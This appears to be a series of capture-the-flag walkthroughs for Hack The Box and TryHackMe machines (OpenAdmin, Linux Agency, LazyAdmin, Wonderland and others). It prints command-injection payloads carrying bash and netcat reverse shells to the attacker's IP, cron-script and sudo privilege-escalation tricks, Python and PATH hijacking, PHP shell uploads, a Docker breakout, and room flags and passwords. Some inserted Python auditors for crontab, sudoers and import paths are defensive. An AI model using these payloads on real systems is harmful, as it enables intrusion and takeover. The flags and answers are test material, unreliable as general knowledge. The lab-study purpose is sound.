Hack The Box solution: OpenAdmin ~ 10.10.10.171

Enumeration

Scan open ports with RustScan:

Use dirsearch:

python3 dirsearch.py -u http://10.10.10.171/

Access: http://10.10.10.171/ona/

We see that: “Your version = v18.1.1”

Searching Exploit Database, we find OpenNetAdmin 18.1.1 – Command Injection Exploit (Metasploit).

Foothold

Send a POST request to the server with this data:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';id;echo+'end';&xajaxargs[]=ping

And the command is executed.

Start a netcat listener on our machine:

nc -lvnp 1234

Call back to our listener with:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.11/1234+0>%261';echo+'end';&xajaxargs[]=ping

There are 2 users:

We will get jimmy's password from /opt/ona/www/local/config/database_settings.inc.php

Spawn a TTY shell with:

python3 -c 'import pty;pty.spawn("/bin/bash");'

Change to jimmy:

su jimmy

Find jimmy's files with:

find / -type f -user jimmy 2>/dev/null | grep -v '/proc/'

We found 3 files:

Read main.php and index.php.

So, once we log in as jimmy, we will have joanna's SSH private key.

Check local open ports with:

(netstat -punta || ss -ntpu)

So I think internal is hosted on port 52846.

And we can easily get the key with:

curl localhost:52846/main.php -H 'Session: username=jimmy'

Save the key to a file named id_rsa.

We will use John the Ripper's ssh2john.py to turn the private key into a crackable hash.

python3 ssh2john.py id_rsa > hash

Next, we use John the Ripper with rockyou.txt.

john-the-ripper -w=rockyou.txt hash

Then we can connect over SSH:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

And we have the key.

Privilege Escalation

Check what we can do with:

sudo -l

Following the steps in GTFOBins, we can easily get root.

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

TryHackMe solution: Linux Agency

Link: https://tryhackme.com/room/linuxagency

Task 3: Linux Fundamentals

#1 “What is the mission1 flag?”

Connect over SSH and you have the flag.

#2 “What is the mission2 flag?”

Use ls in /home/mission1.

#3 “What is the mission3 flag?”

Read the flag in /home/mission2.

#4 “What is the mission4 flag?”

strings flag.txt

#5 “What is the mission5 flag?”
#6 “What is the mission6 flag?”
#7 “What is the mission7 flag?”
#8 “What is the mission8 flag?”
#9 “What is the mission9 flag?”

find / -type f -user mission8 2>/dev/null | grep -v proc

#10 “What is the mission10 flag?”

grep mission10 rockyou.txt

#11 “What is the mission11 flag?”

find . -type f

#12 “What is the mission12 flag?”

Read .bashrc

cat .bashrc

Decode the string with a Base64 decoder.

fTAyN2E5Zjc2OTUzNjQ1MzcyM2NkZTZkMzNkMWE5NDRmezIxbm9pc3NpbQo=

Then reverse the result with the Best Reverse String / Text tool.

#13 “What is the mission13 flag?”

chmod +r flag.txt
cat flag.txt

#14 “What is the mission14 flag?”

bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=

Decode the string with a Base64 decoder.

#15 “What is the mission15 flag?”
01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001 00110101 01111011 01100110 01100011 00110100 00111001 00110001 00110101 01100100 00111000 00110001 00111000 01100010 01100110 01100001 01100101 01100110 01100110 00110000 00110001 00110001 00111000 00110101 01100011 00110011 00110101 00110100 00110111 01100110 00110010 00110101 00110101 00111001 00110110 01111101

Decode the string with a Binary to Text translator.

#16 “What is the mission16 flag?”

6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D

Decode the string with a Hex to Text converter.

#17 “What is the mission17 flag?”

chmod +x flag
./flag

#18 “What is the mission18 flag?”

You can run the Java file with an online Java compiler.

#19 “What is the mission19 flag?”

ruby flag.rb

#20 “What is the mission20 flag?”

You can run the C file with an online C compiler.

#21 “What is the mission21 flag?”

python3 flag.py

#22 “What is the mission22 flag?”

Read .bashrc

cat .bashrc

Decode the string with a Base64 decoder.

fWZhYTk0ZDI0YjQ4OTZlMmE2ZGU5ODgwYmU0N2FhYzQyezIybm9pc3NpbQo=

Then reverse the result with the Best Reverse String / Text tool.

#23 “What is the mission23 flag?”

We will use Python to run system commands.

import os
os.system('cd && ls -la')
os.system('cd && cat flag.txt')

#24 “What is the mission24 flag?”

We have a message here; the hints are ‘hosts’ and ‘curly’.

So we read /etc/hosts, find a host, and use curl against it.

cat /etc/hosts
curl mission24.com | grep mission

#25 “What is the mission25 flag?”

We found an executable file; running it, we get:

Use ltrace:

ltrace ./bribe

So, we have to put money in ‘pocket’ and give ‘init’ a value.

export pocket=money
export init=1
./bribe

#26 “What is the mission26 flag?”

We have to call commands by their full path:

/bin/ls
/bin/cat flag.txt

#27 “What is the mission27 flag?”

We have an image:

strings flag.jpg | grep mission

#28 “What is the mission28 flag?”

We have a .gz file, extract it and read the flag:

gzip -d flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png | grep mission

#29 “What is the mission29 flag?”

We will use Ruby to run system commands.

system('cd && ls -la')
system('cd && cat txt.galf')

Then reverse the output with the Best Reverse String / Text tool.

#30 “What is the mission30 flag?”

The hint is:

“Maybe!! You need to know how to set authentication on websites.”

After a little research, I found .htpasswd:

cat .htpasswd

#31 “What is viktor’s Flag?”

The hint is:

“You will need a time machine used by programmers.”

So we think about logs.

Task 4: Privilege Escalation

#1 “What is dalia’s flag?”

Check crontab:

cat /etc/crontab

We see that dalia executes /opt/scripts/47.sh every minute, so we can write to this file.

Start a netcat listener on our machine:

nc -lvnp 1234

Append to /opt/scripts/47.sh:

echo 'bash -i >& /dev/tcp/10.6.63.158/1234 0>&1' >> /opt/scripts/47.sh

Wait a little bit and we have the shell:
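
A defender-side check for this class of misconfiguration, added here as an example and not part of the room or of the original write-up: parse /etc/crontab and report scheduled commands whose files someone other than root or the scheduled user can rewrite. The crontab text, file modes and uid map in demo() are constructed; audit_crontab and its helpers are hypothetical names.

```python
import os
import pwd
import re
import stat
from types import SimpleNamespace

# Five schedule fields (or an @keyword), then the run-as user, then the command.
CRON_LINE = re.compile(r"^(?:(?:\S+\s+){5}|@\w+\s+)(\S+)\s+(.+)$")

def cron_entries(text):
    """Yield (user, command) from /etc/crontab text, skipping comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)

def absolute_paths(command):
    """Absolute paths in a cron command: the script itself, but also interpreters and arguments."""
    return [tok for tok in re.split(r"[\s;|&]+", command) if tok.startswith("/")]

def audit_crontab(text, stat_fn=os.stat, uid_of=lambda u: pwd.getpwnam(u).pw_uid):
    """Return (user, path, reason) for each path a cron job runs that someone other than
    root or the scheduled user could rewrite; cron would then execute their content."""
    findings = []
    for user, command in cron_entries(text):
        for path in absolute_paths(command):
            try:
                st = stat_fn(path)
                owner_ok = st.st_uid in (0, uid_of(user))
            except (FileNotFoundError, KeyError):  # path or user does not exist
                continue
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((user, path, f"mode {stat.filemode(st.st_mode)} is group/world writable"))
            elif not owner_ok:
                findings.append((user, path, f"owned by uid {st.st_uid}, not root or {user}"))
    return findings

def demo():
    """Constructed crontab and fake stat results modelled on the room (not a real host)."""
    crontab = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   dalia   /opt/scripts/47.sh
@daily          root    /usr/local/bin/backup.sh
"""
    fake_fs = {  # dalia's script is world-writable; backup.sh is owned by an unrelated uid
        "/opt/scripts/47.sh": SimpleNamespace(st_mode=0o100777, st_uid=0),
        "/usr/local/bin/backup.sh": SimpleNamespace(st_mode=0o100755, st_uid=1002),
    }
    uids = {"root": 0, "dalia": 1001}

    def fake_stat(path):
        if path not in fake_fs:
            raise FileNotFoundError(path)
        return fake_fs[path]

    return audit_crontab(crontab, stat_fn=fake_stat, uid_of=uids.__getitem__)
```

Run against a live host with `audit_crontab(open("/etc/crontab").read())`; the same check applies to the files under /etc/cron.d.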

#2 “What is silvio’s flag?”

Check what we can do with:

sudo -l

Following the steps in GTFOBins, we can change to silvio.

TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'

#3 “What is reza’s flag?”

Use:

sudo -l

Spawn a TTY shell with:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Then change to reza with:

sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help

#4 “What is jordan’s flag?”

Use:

sudo -l

We can run a Python file as jordan, but we cannot read or write that file. Try running it:

sudo -u jordan /opt/scripts/Gun-Shop.py

So, we will write a module for this file to import.

cd /tmp
echo 'import os' > shop.py
echo 'os.system("/bin/bash");' >> shop.py

And change to jordan with:

sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py

Then reverse the flag with the Best Reverse String / Text tool.

#5 “What is ken’s flag?”

Use:

sudo -l
sudo -u ken less /etc/profile
!/bin/sh

#6 “What is sean’s flag?”

Use:

sudo -l
sudo -u sean vim -c ':!/bin/sh'

sean's flag is in /var/log/syslog.bak:

grep sean /var/log/syslog.bak

#7 “What is penelope’s flag?”

Next to sean's flag, there is a base64 string:

VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==

Decode the string with a Base64 decoder and we have penelope's password.

#8 “What is maya’s flag?”

In penelope's home there is a file (base64) owned by maya with its SUID bit set, so we use it to read files in /home/maya.

./base64 /home/maya/flag.txt

Decode the string.

#9 “What is robert’s Passphrase?”

We have a message:

We will get robert's id_rsa.

On our machine, we will use John the Ripper to crack the private key, starting with ssh2john.py.

python3 ssh2john.py id_rsa > hash

Next, we use John the Ripper with rockyou.txt.

This link tells us how to install and use John the Ripper.

john-the-ripper -w=rockyou.txt hash

#10 “What is user.txt?”

We cannot change to robert. Check open ports:

ss -lntu

Port 2222 is open, so we try connecting to the SSH server there.

ssh robert@127.0.0.1 -p 2222 -i id_rsa

Use the passphrase we found before.

Check what we can do with:

sudo -l

We can get root with:

sudo -u#-1 /bin/bash

#11 “What is root.txt?”

Use:

cat /proc/1/cgroup

We are inside a Docker container, so we follow the steps in Mounted docker socket to break out of it.

find / -name docker.sock 2>/dev/null
docker images

But there is an error:

So, we look for the docker binary:

find / -name '*docker*' 2>/dev/null

And we found: /tmp/docker

/tmp/docker images
/tmp/docker run -it -v /:/host/ b5f279024ce0 chroot /host/ bash

And we finished the room.

TryHackMe solution: Anonymous

Link: https://tryhackme.com/room/anonymous

#1 “Enumerate the machine. How many ports are open?”
#2 “What service is running on port 21?”
#3 “What service is running on ports 139 and 445?”

Scan open ports with RustScan:

rustscan -a 10.10.205.6 -- -sCV

#4 “There’s a share on the user’s computer. What’s it called?”

We check for available shares on the host with smbclient.

smbclient -N -L \\\\10.10.205.6\\

#5 “user.txt”

Anonymous FTP login is allowed, so we connect to the FTP server:

ftp 10.10.205.6

with:

username: anonymous
password: anonymous

Get these files.

Edit the file clean.sh into:

And upload it to the server:

append clean.sh

Start a netcat listener on our machine:

nc -lvnp 1234

Wait a little and we have the user shell.

#6 “root.txt”

Find SUID files with:

find / -type f -perm -u=s 2>/dev/null

And we found: /usr/bin/env

We can get root with:

env /bin/sh -p

And we found the flag.

TryHackMe solution: VulnNet: Internal

Link: https://tryhackme.com/room/vulnnetinternal

#1 “What is the services flag? (services.txt)”

Use nmap to find open ports:

nmap -sCV 10.10.127.171

We check for available shares on the host with smbclient.

We can install it with:

sudo apt-get install smbclient

The options we use:

-N, --no-pass     Don't ask for a password
-L, --list=HOST   Get a list of shares available on a host

smbclient -N -L \\\\10.10.127.171\\

There is a share named shares, and we access it with:

smbclient -N \\\\10.10.127.171\\shares

And we have services.txt.

#2 “What is the internal flag? (“internal flag”)”

List the NFS exports with:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.127.171

We will create a new directory and mount the export to it.

mkdir conf
mount -t nfs 10.10.127.171:/opt/conf conf

The Redis password is in conf/redis/redis.conf.

grep "pass" conf/redis/redis.conf

Install redis-tools with:

sudo apt install redis-tools

And connect to Redis:

redis-cli -h 10.10.127.171 -a 'B65Hx562F@ggAZ@F'

Get the flag with:

get "internal flag"

#3 “What is the user flag? (user.txt)”

Get the authlist key:

lrange authlist 0 10

And we have a base64 string:

QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==

Decoding it gives us the authorization for rsync.

Enumerate rsync:

rsync -av --list-only rsync://10.10.127.171:873

Create a new directory and copy all files to it:

mkdir rsync
rsync -av rsync://rsync-connect@10.10.127.171:873/files ./rsync

And we have user.txt and the username “sys-internal”.

#4 “What is the root flag? (root.txt)”

We will upload an SSH public key to the server with rsync:

ssh-keygen -f id_rsa
rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.127.171:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g

Connect over SSH:

ssh sys-internal@10.10.127.171 -i id_rsa

This room is vulnerable to CVE-2021-3493 and we can exploit it with this.

Download exploit.c and host an HTTP server on our machine:

python3 -m http.server

In the target machine, we run:

cd /tmp
wget http://10.6.63.158:8000/exploit.c
gcc exploit.c -o exploit
./exploit

And we get /root/root.txt.

TryHackMe solution: Overpass 2 – Hacked

Link: https://tryhackme.com/room/overpass2hacked

Task 1: Forensics – Analyse the PCAP

#1 “What was the URL of the page they used to upload a reverse shell?”

Download the pcapng file, open it with Wireshark and use Follow TCP Stream. The answer is in Stream 0.

#2 “What payload did the attacker use to gain access?”

The answer is in Stream 1.

#3 “What password did the attacker use to privesc?”
#4 “How did the attacker establish persistence?”

The answer is in Stream 3.

#5 “Using the fasttrack wordlist, how many of the system passwords were crackable?”

Save the /etc/shadow contents from Stream 3 to a file named “shadow”.

Download the fasttrack wordlist.

Next, we use John the Ripper to crack the passwords.

This link tells us how to install and use John the Ripper.

john-the-ripper shadow -w=fasttrack.txt

Task 2: Research – Analyse the code

#1 “What’s the default hash for the backdoor?”
#2 “What’s the hardcoded salt for the backdoor?”

Access the github link in Stream 3 and read main.go to get the answers.

#3 “What was the hash that the attacker used? – go back to the PCAP for this!”

The answer is in Stream 3.

#4 “Crack the hash using rockyou and a cracking tool of your choice. What’s the password?”

Copy the hash and the salt to a file in this format:

hash$salt

And use John the Ripper with rockyou.txt to crack the hash.

john-the-ripper hash --format='dynamic=sha512($p.$s)' -w=rockyou.txt

Task 3: Attack – Get back in!

#1 “The attacker defaced the website. What message did they leave as a heading?”

Access the webpage: http://10.10.175.129/

#2 “What’s the user flag?”

In Stream 3, we saw that SSH is reachable on port 2222.

ssh james@10.10.140.222 -p 2222

Use the password we just found in task 2.

#3 “What’s the root flag?”

The hint is: “Did the attacker leave a quick way for them to get root again without a password?”

This refers to a file named “.suid_bash” in /home/james, and we can get root with:

./.suid_bash -p

We can get the explanation here.

TryHackMe solution: LazyAdmin

Link: https://tryhackme.com/room/lazyadmin

#1 “What is the user flag?”

First, use nmap:

nmap -sCV 10.10.52.134

Next, use dirsearch:

python3 dirsearch.py -u 10.10.52.134

And we found: http://10.10.52.134/content/

A little research shows that there are 2 vulnerabilities we can use against this machine:
– SweetRice 1.5.1 – Backup Disclosure
– SweetRice 1.5.1 – Arbitrary File Upload

Backup Disclosure

We can access all MySQL backups and download them from this directory:

http://10.10.52.134/content/inc/mysql_backup/

Download the SQL file and open it; we get a credential:

username: manager
password: 42f749ade7f9e195bf475f37a44cafcb

Crack the hash with CrackStation and we get the password.

And we can log in to the admin panel at:

http://10.10.52.134/content/as/

Arbitrary File Upload

The Media Center feature of this web application is vulnerable.

We try to upload a php-reverse-shell.php to the server (after changing the IP), compressed into a zip file.

Select “Extract zip archive?”.

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Click the file that we uploaded.

And we get the shell.

We can find the flag at /home/itguy/user.txt.

#2 “What is the root flag?”

Spawn a tty shell with:

python3 -c 'import pty; pty.spawn("/bin/sh");'

See what we can do with:

sudo -l
cat /home/itguy/backup.pl
cat /etc/copy.sh

Then, we edit /etc/copy.sh to call back to our machine:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1235 >/tmp/f' > /etc/copy.sh

Stand up a netcat listener on port 1235.

nc -lvnp 1235

Run that file as root.

sudo /usr/bin/perl /home/itguy/backup.pl

And we found the flag.

TryHackMe solution: RootMe

Link: https://tryhackme.com/room/rrootme

Task 2: Reconnaissance

#1 “Scan the machine, how many ports are open?”
#2 “What version of Apache is running?”
#3 “What service is running on port 22?”

nmap -sCV 10.10.240.224

#4 “Find directories on the web server using the GoBuster tool.”
#5 “What is the hidden directory?”

We can use this common.txt.

gobuster dir -u http://10.10.240.224/ -w common.txt

Task 3: Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Access: http://10.10.240.224/panel/

We try to upload a php-reverse-shell.php to the server (after changing the IP).

But php is not allowed. Rename our shell to php-reverse-shell.phtml and we can upload it now.

#1 “user.txt”

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Trigger our shell with: http://10.10.240.224/uploads/php-reverse-shell.phtml

Find user.txt with:

find / -type f -name "user.txt" 2>/dev/null

Task 4: Privilege escalation

#1 “Search for files with SUID permission, which file is weird?”

Use this command:

find / -perm -u=s -type f 2>/dev/null

#2 “Find a form to escalate your privileges.”

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Explanation.

#3 “root.txt”

We found root.txt in /root.

TryHackMe solution: Bounty Hacker

Link: https://tryhackme.com/room/cowboyhacker

#1 “Who wrote the task list?”

Find open ports on the machine.

nmap -sCV 10.10.92.168

Anonymous FTP login is allowed, so I try to log in:

ftp 10.10.92.168

Read task.txt and we have the answer.

#2 “What service can you bruteforce with the text file found?”

Port 22 is open, so …

#3 “What is the users password?”

Use hydra and the text file to brute force.

hydra -l lin -P locks.txt 10.10.92.168 ssh

#4 “user.txt”

After finding the password, log in over SSH and get the flag.

ssh lin@10.10.92.168

#5 “root.txt”

Use:

sudo -l
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And we found root.txt.

TryHackMe solution: Wonderland

Link: https://tryhackme.com/room/wonderland

#1 “Obtain the flag in user.txt”

First, we use:

nmap -sCV 10.10.26.131

to find open ports on the machine.

Next, we can use dirsearch to enumerate.

python3 dirsearch.py -u 10.10.26.131

And we found folder /r.

Keep using dirsearch to enumerate, several levels deeper.

python3 dirsearch.py -u 10.10.26.131/r

Finally, we find the door we need.

View the page source and we have a username and password, which we use to log in over SSH.

ssh alice@10.10.26.131

We found root.txt in /home/alice but cannot open it.

There is a hint.

So, I think that user.txt will be in /root.

cat /root/user.txt

#2 “Escalate your privileges, what is the flag in root.txt?”

#rabbit

Find what alice can do with:

sudo -l

So alice can run python3.6 as rabbit.

cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

...

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

Then we will create a new random.py for this program to import.

echo 'import os' > random.py
echo 'os.system("/bin/sh")' >> random.py

Run this file as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
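
Both Python escalations in this write-up (Gun-Shop.py with PYTHONPATH=/tmp/ and the poem script with a planted random.py) work because a directory that CPython searches before the standard library is writable by the caller. As an added example, not code from either room or from the original post, this audit reports such directories for a script that sudo runs as another user; the scripts and directories in demo() are built in a temp dir and audit_sudo_python is a hypothetical helper.

```python
import ast
import os
import tempfile
from pathlib import Path

def imported_modules(source):
    """Top-level module names a script imports, e.g. ['random'] for the poem script."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def audit_sudo_python(script, pythonpath="", writable=None, isolated=False):
    """Return (directory, detail) findings for a script that sudo runs as another user.

    CPython resolves imports from the script's own directory first, then from each
    PYTHONPATH entry, and only then from the standard library. If the invoking user can
    write to one of those leading directories, a file there named after an imported
    module (random.py, os.py, ...) is loaded instead of the real one and runs as the
    target user. `writable` is a Path -> bool predicate for the invoking user (default:
    the current process). isolated=True models `python3 -I`, which searches neither the
    script directory nor PYTHONPATH and so closes both holes.
    """
    script = Path(script).resolve()
    writable = writable or (lambda p: os.access(p, os.W_OK))
    mods = imported_modules(script.read_text())
    if isolated:
        return []
    search = [script.parent] + [Path(p) for p in pythonpath.split(os.pathsep) if p]
    findings = []
    for directory in search:
        if not writable(directory):
            continue
        planted = [m for m in mods
                   if (directory / f"{m}.py").exists() or (directory / m / "__init__.py").exists()]
        detail = f"already shadowed: {planted}" if planted else f"writable; can shadow: {mods}"
        findings.append((str(directory), detail))
    return findings

def demo():
    """Rebuild both layouts from this write-up in a temp dir (constructed, not the rooms' files)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp, "alice")          # writable home holding the sudo-able script
        home.mkdir()
        poem = home / "walrus_and_the_carpenter.py"
        poem.write_text("import random\nprint(random.choice(['a', 'b']))\n")
        results["wonderland_before"] = audit_sudo_python(poem)
        (home / "random.py").write_text("# planted shadow module (constructed marker)\n")
        results["wonderland_after"] = audit_sudo_python(poem)
        results["wonderland_isolated"] = audit_sudo_python(poem, isolated=True)

        scripts = Path(tmp, "opt_scripts")  # root-owned script dir, not writable by the caller
        scripts.mkdir()
        shop = scripts / "Gun-Shop.py"
        shop.write_text("import os\nimport shop\n")
        pythonpath_dir = Path(tmp, "pp")     # stands in for PYTHONPATH=/tmp/
        pythonpath_dir.mkdir()
        results["gunshop"] = audit_sudo_python(
            shop, pythonpath=str(pythonpath_dir), writable=lambda p: p == pythonpath_dir)
    return results
```

The fix on the administrator's side is the same in both rooms: keep the script and its directory root-owned, and let sudo run `/usr/bin/python3 -I script.py` rather than a bare script path with SETENV.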

#hatter

There is a file named teaParty in /home/rabbit. Run it and we get:

There is a line in teaParty.

/bin/echo -n 'Probably by ' && date --date='next hour' -R

This file calls date by name, so we create our own date for it to call:

echo '#!/bin/bash' > /tmp/date
echo '/bin/bash' >> /tmp/date
chmod +x /tmp/date

Make sure the system finds our date first:

export PATH=/tmp:$PATH

Run teaParty again to get hatter's shell.

#root

There is a password file in /home/hatter, we will use this password to access ssh as hatter.

ssh hatter@10.10.26.131

We will use getcap to examine file capabilities.

-r  enables recursive search
getcap -r / 2>/dev/null

/usr/bin/perl has cap_setuid+ep.

We will get root’s shell with:

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

And we get root's flag:

cat /home/alice/root.txt

TryHackMe solution: Pickle Rick

Link: https://tryhackme.com/room/picklerick

#1 “What is the first ingredient Rick needs?”

First, we go to the web page.

View the page source and we find:

Then I guess we need to find a login form.

Let’s use dirsearch:

python3 dirsearch.py -u http://10.10.227.165/

Then we go to robots.txt; there is a string, and I guess it is the password we need.

Use the username and password to log in at /login.php

We then access a page where we can run commands.

Let’s run ls:

I tried the cat command, but:

Then, I use:

strings Sup3rS3cretPickl3Ingred.txt

and found the first ingredient.

#2 “Whats the second ingredient Rick needs?”

strings clue.txt

Then, we need to look around the file system.

cd /home; ls
cd /home/rick; ls
strings '/home/rick/second ingredients'

And we found the second ingredient.

#3 “Whats the final ingredient Rick needs?”

Continue looking around, we use:

sudo ls /root

Finally:

sudo strings /root/3rd.txt
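
Looking at the rules behind all the sudo -l checks in this write-up from the administrator's side, as an added example that is not part of any room or of the original post: a small sudoers parser that flags the rule shapes exploited above, a ‘!’ runas exclusion (the -u#-1 case), GTFOBins shell escapes, interpreters given a fixed script, and SETENV on a Python command. The sudoers text in demo() is constructed, and the function and finding names are hypothetical.

```python
import re
from pathlib import PurePosixPath

# Programs this write-up escalates through; each is a documented GTFOBins shell escape.
SHELL_ESCAPES = {"nano", "vim", "less", "zip", "git", "tar", "bash", "sh"}
INTERPRETERS = ("python", "perl", "ruby")

RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"  # user or %group, then host list
    r"(?:\((?P<runas>[^)]*)\)\s*)?"          # optional (runas_users[:runas_groups])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"             # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Yield user specifications as dicts; Defaults, aliases, includes and comments are skipped."""
    skip = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@include")
    for raw in text.splitlines():
        line = re.sub(r"(^|\s)#.*$", "", raw).strip()
        m = RULE.match(line)
        if not line or line.startswith(skip) or not m:
            continue
        yield {"who": m["who"],
               "runas": (m["runas"] or "root").split(":")[0].strip(),
               "tags": {t for t in re.split(r":\s*", m["tags"]) if t},
               "cmds": [c.strip() for c in m["cmds"].split(",")]}

def audit_sudoers(text):
    """Return (who, kind, detail) for rules that grant more than they appear to."""
    findings = []
    for rule in parse_sudoers(text):
        who, runas = rule["who"], rule["runas"]
        if "!" in runas:
            findings.append((who, "runas-negation", f"({runas}): '!' exclusions were bypassed "
                             "with -u#-1 on unpatched sudo; list permitted targets explicitly"))
        can_set_env = "SETENV" in rule["tags"]
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                continue
            argv = cmd.split()
            prog = PurePosixPath(argv[0]).name
            if prog in SHELL_ESCAPES:
                findings.append((who, "shell-escape", f"{cmd} as {runas}: {prog} can spawn a shell"))
            elif prog.startswith(INTERPRETERS) and len(argv) > 1:
                findings.append((who, "fixed-script", f"{cmd} as {runas}: the script and every "
                                 f"directory on its import path must not be writable by {who}"))
            elif prog.startswith(INTERPRETERS):
                findings.append((who, "interpreter", f"{cmd} as {runas}: -c/-e one-liners spawn a shell"))
            if can_set_env and (prog.startswith("python") or prog.endswith(".py")):
                findings.append((who, "setenv-pythonpath", f"{cmd} as {runas}: SETENV lets {who} "
                                 f"pass PYTHONPATH, so modules of their choice load as {runas}"))
    return findings

def demo():
    """Constructed sudoers modelled on the rules behind this write-up's `sudo -l` output."""
    sudoers = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
lin     ALL=(root) NOPASSWD: /bin/tar
alice   ALL=(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
reza    ALL=(jordan) SETENV: /opt/scripts/Gun-Shop.py
robert  ALL=(ALL, !root) /bin/bash
"""
    return audit_sudoers(sudoers)
```

On a real host run `audit_sudoers(open("/etc/sudoers").read())` and repeat for each file in /etc/sudoers.d; the parser deliberately ignores aliases, so expand those by hand.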